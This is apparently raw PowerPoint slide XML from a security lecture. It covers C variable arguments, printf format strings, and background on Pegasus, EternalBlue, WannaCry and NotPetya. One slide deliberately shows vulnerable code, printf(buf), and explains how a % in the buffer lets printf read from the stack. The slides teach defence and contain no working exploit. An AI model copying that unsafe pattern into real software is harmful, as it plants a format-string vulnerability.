              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>pegasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>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2BF0C-F9A2-2F49-A0EA-47DAD996825E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2774949" y="4095836"/>
            <a:ext cx="58801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Based on an integer overflow vulnerability in Apple’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>CoreGraphics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> image rendering library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BCC885-C73A-0543-B860-CCD1E7F9A18D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3199020" y="3240150"/>
            <a:ext cx="564840" cy="779040"/>
            <a:chOff x="3199020" y="2916300"/>
            <a:chExt cx="564840" cy="77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3834AA1-4B3A-3748-9AA7-ED723A0596A7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3363540" y="2925300"/>
                <a:ext cx="177840" cy="770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3834AA1-4B3A-3748-9AA7-ED723A0596A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27900" y="2889660"/>
                  <a:ext cx="249480" cy="84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658CFBD-50B6-F04A-9E82-BA5FD62F6933}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3199020" y="2916300"/>
                <a:ext cx="107280" cy="207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658CFBD-50B6-F04A-9E82-BA5FD62F693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63380" y="2880300"/>
                  <a:ext cx="1789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917D4C-DA45-1443-99D4-D00252974848}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3330420" y="2923860"/>
                <a:ext cx="433440" cy="214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917D4C-DA45-1443-99D4-D0025297484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94780" y="2888220"/>
                  <a:ext cx="505080" cy="28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F6BD775-EA11-544E-9E16-631A27FE530F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4807140" y="4566750"/>
              <a:ext cx="2357280" cy="46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F6BD775-EA11-544E-9E16-631A27FE530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71140" y="4531110"/>
                <a:ext cx="2428920" cy="11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2918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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91930E3E-20BE-F049-B4C3-4F7A70832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Variable Arguments in C</a:t>
            </a:r>
          </a:p>
        </p:txBody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B9AC821F-739A-D740-BA76-8E438B2458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dirty="0"/>
              <a:t>In C, can define a function with a variable number of arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(const char* format, …)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88070" name="Picture 7" descr="p">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2F8245-8793-FE4B-A966-92AE1F354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0" t="36296" r="38510" b="54875"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1376362" y="3413099"/>
            <a:ext cx="8001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032" name="Oval 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3014A208-46B5-7F41-AB71-D9927C004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162" y="3755999"/>
            <a:ext cx="457200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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37033" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{986FD432-CF2C-374B-BEB8-CBC29189D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562" y="3755999"/>
            <a:ext cx="457200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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37034" name="Oval 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CD933A-36FF-3E4A-BB0E-84E54770F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962" y="4060799"/>
            <a:ext cx="457200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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37035" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E039CB-D3A8-8C4B-BF1D-88DC5CEFF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6362" y="4664428"/>
            <a:ext cx="7026573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Format specification encoded by special % characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> %d,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>o,%u,%x,%X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> – integer argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> %s – string argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> %p – pointer argument (void *)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Several others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239686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032" grpId="0" animBg="1"/>
      <p:bldP spid="1537033" grpId="0" animBg="1"/>
      <p:bldP spid="1537034" grpId="0" animBg="1"/>
      <p:bldP spid="153703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BA85DF70-1398-7148-BB2D-62E857B3B9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Implementation of Variable Args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BF8861FC-0AE9-5541-BF5B-0F2174ABB2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12371" y="1958012"/>
            <a:ext cx="8178800" cy="99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000" dirty="0"/>
              <a:t>Special functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>va_start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va_arg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va_end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> compute arguments at run-time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89092" name="Picture 5" descr="p">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71330108-C6A9-1248-9BCB-7D5134DA0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34335" r="19917" b="10934"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1252537" y="2576511"/>
            <a:ext cx="7169986" cy="3747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Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB973B2F-3A03-DC43-AF14-666044DB0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8162" y="33147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E62A7CC0-C7DF-034C-A5AB-66A5D27F8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1460" y="3744634"/>
            <a:ext cx="2167581" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="158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 dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a: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 has an internal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stack pointer</a:t>
            </a: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ACF11C04-E0CD-2F4B-A098-CE28B7F937E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18162" y="3282329"/>
            <a:ext cx="3595688" cy="457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Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D120097-ADCC-8749-9F1A-FA805562E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5998" y="3733116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0117" name="Picture 4" descr="p">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD326EB6-8228-6D4F-A12C-4EED40D51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27467" r="15309" b="11424"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1138238" y="1781885"/>
            <a:ext cx="6800850" cy="4615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05" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010CD422-4B82-D946-BBA4-238DEF899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1162" y="2842529"/>
            <a:ext cx="2403222" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7E79"/>
          </a:solidFill>
          <a:ln w="15875" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00206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va_start computes</a:t>
            </a:r>
          </a:p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location on the stack</a:t>
            </a:r>
          </a:p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past last statically</a:t>
            </a:r>
          </a:p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known argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536006" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E7DFD1-1169-CD41-ADA1-EC505ABB85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3873" y="3239403"/>
            <a:ext cx="1157288" cy="1524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36007" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE98C420-8F50-6E46-AD38-640C653D05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50933" y="2595565"/>
            <a:ext cx="963612" cy="244475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36008" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A2B4CCB-3308-7447-9593-B9361F0A9F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50933" y="2992439"/>
            <a:ext cx="963612" cy="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36009" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A7410B0-4A4B-3340-AA25-9061DE2D713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0933" y="3144839"/>
            <a:ext cx="963612" cy="280988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36010" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3CF4C2-8554-A941-B1FD-3201043A2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546" y="2519364"/>
            <a:ext cx="2109873" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7E79"/>
          </a:solidFill>
          <a:ln w="15875" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00206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va_arg(ap,type) </a:t>
            </a:r>
          </a:p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retrieves next arg </a:t>
            </a:r>
          </a:p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from offset ap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C0CEFC-FB56-A94C-987C-215BE832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with Variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Args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4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05" grpId="0" animBg="1"/>
      <p:bldP spid="15360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2" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635CC080-70CE-A74E-A775-1F2FA1070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Sloppy Use of Format Strings in C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91141" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64218468-53E1-0A4A-9F36-2AF288F96E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sz="2400" dirty="0"/>
              <a:t>Proper use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> format string:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>int foo=1234; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(“foo = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> in decimal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>%X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> in hex”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>foo,foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Sloppy use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> format string:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[13]=“Hello, world!”; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>; 	// should of used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(“%s”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>); …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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FEB87-E46E-8C49-8B29-56D582B70E2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772355" y="1912281"/>
            <a:ext cx="3414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will print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>foo = 1234 in decimal, 4D2 in hex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55C2A7-9200-7A44-A245-A03ACB0A28FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7025715" y="2195775"/>
            <a:ext cx="739440" cy="691560"/>
            <a:chOff x="7025715" y="2195775"/>
            <a:chExt cx="739440" cy="69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4F82432-BCEC-FC45-9BD9-6D6591A47699}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7025715" y="2195775"/>
                <a:ext cx="668520" cy="691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4F82432-BCEC-FC45-9BD9-6D6591A4769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16715" y="2187135"/>
                  <a:ext cx="68616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324A42A-8120-6F4E-8167-1AB471A0B412}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7701435" y="2210895"/>
                <a:ext cx="63720" cy="183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324A42A-8120-6F4E-8167-1AB471A0B41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92435" y="2202255"/>
                  <a:ext cx="81360" cy="200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1A1F3B9-F0C3-DD4D-B8B9-0515DC0A12BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973588" y="4802353"/>
            <a:ext cx="85277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altLang="en-US" sz="2000" dirty="0"/>
              <a:t>If the buffer contains a format symbol starting with %, the location pointed to by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>printf’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> internal stack pointer will be interpreted as an argument of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000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3A2FA-57E2-6344-8038-C2DAF29DC95A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973587" y="5629578"/>
            <a:ext cx="7327576" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7E79"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>This can be exploited to move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>printf’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> internal stack pointer.  How?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713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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7045E30-7475-164B-9302-832D7CDA27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EternalBlue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79EA2C63-9ACA-3A4F-91CA-35EE01B4D5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sz="2800" dirty="0"/>
              <a:t>A complex memory exploit developed by NSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Targets Microsoft’s implementation of SMB in multiple versions of Windows, Siemens medical equipment, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Leaked by “Shadow Brokers” in April 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Used by WannaCry ransomware and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>NotPetya</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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692CF3-7B6E-8B4C-994D-F38F8D421C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9206831" y="642594"/>
            <a:ext cx="2279791" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill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Integer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
